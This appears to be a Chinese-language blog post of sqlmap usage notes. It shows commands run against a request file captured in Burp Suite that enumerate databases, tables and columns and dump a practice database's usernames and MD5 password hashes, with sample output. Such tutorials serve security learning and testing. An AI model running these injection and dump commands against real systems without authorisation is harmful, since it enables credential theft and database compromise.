sqlmap

发表于 更新于 分类于

sqlmap使用笔记。

官网:sqlmap: automatic SQL injection and database takeover tool

结合burpsuit

先使用burpsuit抓包,将请求包内容存入文件,如“burp.log”

智能模式

-l 后跟burp请求包文件,–batch 表示使用默认操作,-smart开启智能模式

1
sqlmap -l burp.log --batch -smart

查看数据库

1
sqlmap -l burp.log --batch -smart --dbs

输出(例):

1
2
3
available databases [2]:
[*] information_schema
[*] Inject_sql

查看数据库里的表

1
sqlmap -l burp.log --batch -smart -D Inject_sql --tables

输出(例):

1
2
3
4
5
Database: Inject_sql
[1 table]
+------+
| auth |
+------+

查看数据库表里的列

1
sqlmap -l burp.log --batch -smart -D Inject_sql -T auth --columns

输出(例):

1
2
3
4
5
6
7
8
9
Database: Inject_sql
Table: auth
[2 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

查看数据库表列里的值

1
sqlmap -l burp.log --batch -smart -D Inject_sql -T auth -C password --dump

输出(例):

1
2
3
4
5
6
7
8
9
10
11
+----------------------------------+
| password                         |
+----------------------------------+
| 098f6bcd4621d373cade4e832627b4f6 |
| 202cb962ac59075b964b07152d234b70 |
| 4aeed0301e36d0e7d405739646ef8ae6 |
| 4e7bdb88640b376ac6646b8f1ecfb558 |
| 72b938f302b9db9b214d9c779c975634 |
| 96e98952b440e8d0361c552fb0e67bc6 |
| e10adc3949ba59abbe56e057f20f883e |
+----------------------------------+
1
sqlmap -l burp.log --batch -smart -D Inject_sql -T auth -C username --dump

输出(例):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
Database: Inject_sql
Table: auth
[7 entries]
+----------+
| username |
+----------+
| 123      |
| admin    |
| lisi     |
| testuser |
| wangwu   |
| zhangsan |
| zhaoliu  |
+----------+

其它

对表dump:也可以直接对表进行dump

选择注入类型: 使用 --technique 选项可以指定使用的注入技术,如:--technique=U (联合查询注入,有具体的payload)或 --technique=B (盲注,没有确定的payload)等